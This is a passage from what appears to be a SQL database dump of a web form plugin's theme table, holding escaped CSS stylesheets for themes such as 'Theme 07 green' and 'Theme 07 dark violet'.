\"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #0072A2;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0072A2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #006C9A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0072A2), color-stop(39%, #00709F), color-stop(100%, #006A97)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #0072A2 0%, #00709F 39%, #006A97 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: \" \";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n',0),(25,'Theme 07 green','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #00A25B;\r\nmargin-bottom: 10px;\r\ncolor: #00A25B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #00A25B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #00A25B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #00A25B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #00A25B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #00A25B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00A25B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00A15B ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #00A25B ), color-stop(39%, #00A15A ), color-stop(100%, #00A15B )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00A25B 0%, #00A15A  39%, #00A15B 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00A25B 0%, #00A15A 39%, #00A15B 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: \" \";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(26,'Theme 07 dark violet','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #33016B;\r\nmargin-bottom: 10px;\r\ncolor: #33016B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% 